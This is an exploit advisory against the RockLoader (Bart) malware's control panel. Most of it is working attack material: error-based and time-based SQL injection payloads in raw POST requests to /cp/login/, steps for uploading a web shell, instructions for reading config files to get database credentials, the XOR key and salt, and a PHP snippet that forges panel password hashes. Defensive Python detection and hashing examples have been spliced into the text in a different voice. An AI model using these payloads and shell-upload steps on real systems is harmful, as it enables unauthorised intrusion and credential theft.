RockLoader SQL Injection / Shell Upload

Posted Jun 30, 2016
Authored by Danail Velev

The RockLoader malware tool suffers from remote shell upload and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
MD5 | 9ead0cdbfb4aa372c930fa5b739b199a

# Exploit Title: RockLoader aka Bart Malware [SQLi] and shell file upload
# Date: 27-06-2016
# Software Link Leak: https://github.com/colocation/RockLoader-source
# Exploit Author: Danail Velev
# Contact: ICQ: 209030 / d.velev@colocation.bg
# Website: http://colocation.bg/
# Category: webapps / malware / private software / infection spreader / C&C
# Inspiration: http://www.xylibox.com/

1. Description

In recent days a new Bart (aka RockLoader) malware/ransomware spreader
has been active.
My family was a victim of this type of extortion past year.

2. Short info: SQL Injections

NO user registration required.
The command and control server that processes the spread requests and
user tasks suffers from multiple remote SQL injections.
The common C&C server path is "/cp/login/" in most setups.
Given the specifics of the spreader, its functionality, its encryption
methods and its working process, there is the possibility of RCE,
MSF/CMD injection and local root post-exploitation.

In common cases the setup comes with these specific configs:
- the user has full privileges on the host SQL server.
- you can interact with local file read in most conditions.
- the user is database administrator in most conditions.
- database name and structure are identical since it comes as a
phpMyAdmin dump.
- file write and read is a must.
- user screen capture plugin on advanced setups.
- the default database name is 'appdater'


3. Proof of Concept:

Affected parameters are "username" and "password" via a specific POST
request.
The third parameter is the PHP session.

----=(SQL Injection 1)=----
Type: error-based
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118 UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)-- KSxg1=6 AND 000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------

=================================================================================================================================================================

POC:
----=(SQL Injection 2)=----
Type: AND/OR time-based blind
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 5.0.12 AND time-based blind
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND 000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------
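For the defensive side of the two injections above, here is an added triage helper (not part of the advisory) that parses a urlencoded login body and flags the markers these payloads rely on: an unterminated quote followed by OR, MySQL SLEEP() for the time-based variant, the FLOOR(RAND(0)*2) ... GROUP BY duplicate-key trick for the error-based variant, and the trailing "--" comment. The indicator names are my own; the sample bodies are the advisory's payloads and a benign login.

```python
import re
from urllib.parse import parse_qs

# Indicator regexes derived from the payloads in this advisory (names are mine).
INDICATORS = {
    "quote_or": re.compile(r"'\s*OR\s+\d+", re.I),
    "time_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "error_floor_rand": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "comment_tail": re.compile(r"--\s*$|--\s"),
}

# Sample POST bodies: the two payloads from the advisory and a benign login.
SAMPLE_ERROR_BASED = (
    "password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT "
    "COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(9213=9213,1))),0x71767a7071,"
    "FLOOR(RAND(0)*2))x FROM (SELECT 4118 UNION SELECT 5903 UNION SELECT 7493 "
    "UNION SELECT 1139)a GROUP BY x)-- KSxg1=6 AND 000580=000580 --"
)
SAMPLE_TIME_BASED = (
    "password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND "
    "000580=000580 --"
)
SAMPLE_BENIGN = "password=S0M3PaSSw0rd&username=d0na1DTrump"


def scan_login_body(body: str) -> dict:
    """Return {param: [indicator, ...]} for each parameter whose value matches
    at least one indicator. A benign login returns an empty dict."""
    hits = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            found = [name for name, rx in INDICATORS.items() if rx.search(value)]
            if found:
                hits.setdefault(param, []).extend(found)
    return hits


if __name__ == "__main__":
    for label, body in (("error-based", SAMPLE_ERROR_BASED),
                        ("time-based", SAMPLE_TIME_BASED),
                        ("benign", SAMPLE_BENIGN)):
        print(label, scan_login_body(body))
```

The same function can be run over request bodies captured by a WAF or a reverse proxy log that records POST data; plain access logs do not include the body.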

=================================================================================================================================================================

POC:
----=(Shell Upload POC)=----
Requirements:
- Valid user for control panel.
- Access to database for reading.

Step1:
Upload your shell as new file via Control Panel.
Name it: OWNED
Note: filename is masked in control panel

Step2:
See 'file' table at 'appdater' database.
QUERY: SELECT * FROM `file`;
Look for name=OWNED and the corresponding file_path name (EXAMPLE: C932kc.php)

Step3:
Location of your Shell
http://127.0.0.1/files/c932kc.php

-----------------END--------------------
=================================================================================================================================================================
POC:
----=(Database user and password disclosure)=----

Example request to get the directory location:

===============================================
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
===============================================
Response if error reporting is enabled:

<br />
<b>Notice</b>: A session had already been started - ignoring
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line
<b>23</b><br />


===============================================

Read the settings.php file of the control panel to obtain the user and
password for the database.
Location: /var/www/html/cp/settings.php

----Snip-----
<?php
//Debug
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF

//MySQL settings
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_DATABASE', 'appdater'); // <- most of the time this is the default database since it comes in the bundle.
define('DB_PORT', '3307');

......
---EndSnip---
=================================================================================================================================================================
POC:
----=(XOR Encryption key and password salt disclosure)=----

Read the settings.php file (/var/www/appdater/html/settings.php) and
look at the global configuration for the app.

----Snip-----
//GLOBAL settings
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); // <- File encryption XOR_KEY
define('FILES_URL', 'https://summerr554fox.su/files/'); // <- address of all uploaded files
define('APPDATER_PATH', '/var/www/html/');
define('SALT', 'KsqwGzTl?Qwq|oHA'); // <- SALT KEY FOUND !
?>
---EndSnip---
TADAAAAAAAAAAAAAAAAAAAAAAAAAa we got the password for the SQL and even
more: XOR_KEY for file encryption, EXE files location, PATH to the
Control Panel and...
The most important --> THE SALT !

=================================================================================================================================================================
POC:
---=(Admin panel password generator)=---

Read the core/functions.php file
(/var/www/appdater/html/core/functions.php) and look for this:

---Snip-----
function create_hash( $string ) {
    return substr( sha1( SALT . $string ), 3, 17 );
}
----EndSnip---

TADAAAA so we also got the algorithm used to create the correct user and
password.


<?php
define('SALT', 'KsqwGzTl?Qwq|oHA');
function create_hash( $string ) {
    return substr( sha1( SALT . $string ), 3, 17 );
}
echo create_hash('S0M3PaSSw0rd');
?>
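To show why the panel's create_hash() scheme is weak as credential storage, here is an added example (mine, not the panel's code) that ports the PHP function to Python beside a hardened replacement. SALT is the value disclosed above; the hardened variant (PBKDF2-HMAC-SHA256 with a random per-password salt and a stored iteration count) is my own choice, and the stored-string format with "$" separators is an assumption of this example.

```python
import hashlib
import hmac
import os

# Global SALT as disclosed from the panel's settings.php in this advisory.
SALT = "KsqwGzTl?Qwq|oHA"


def create_hash(string: str) -> str:
    """Port of create_hash(): PHP substr(sha1(SALT . $string), 3, 17) keeps
    17 hex chars (68 bits) from offset 3 of the 40-char SHA-1 hex digest.
    One global salt plus one unsalted fast hash: identical passwords map to
    identical stored values, and once SALT leaks each guess costs one SHA-1."""
    digest = hashlib.sha1((SALT + string).encode()).hexdigest()
    return digest[3:20]


def pbkdf2_hash(password: str, iterations: int = 200_000) -> str:
    """Hardened replacement (added here): random 16-byte per-password salt,
    PBKDF2-HMAC-SHA256, and the parameters stored with the hash so they can
    be raised later without breaking existing records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations; constant-time comparison."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "S0M3PaSSw0rd"
    print("panel hash  :", create_hash(pw), "(always the same for this password)")
    print("hardened #1 :", pbkdf2_hash(pw))
    print("hardened #2 :", pbkdf2_hash(pw), "(differs: per-password salt)")
```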

=================================================================================================================================================================


4. Solution:

DO NOT WRITE BUGGY APPZ:)
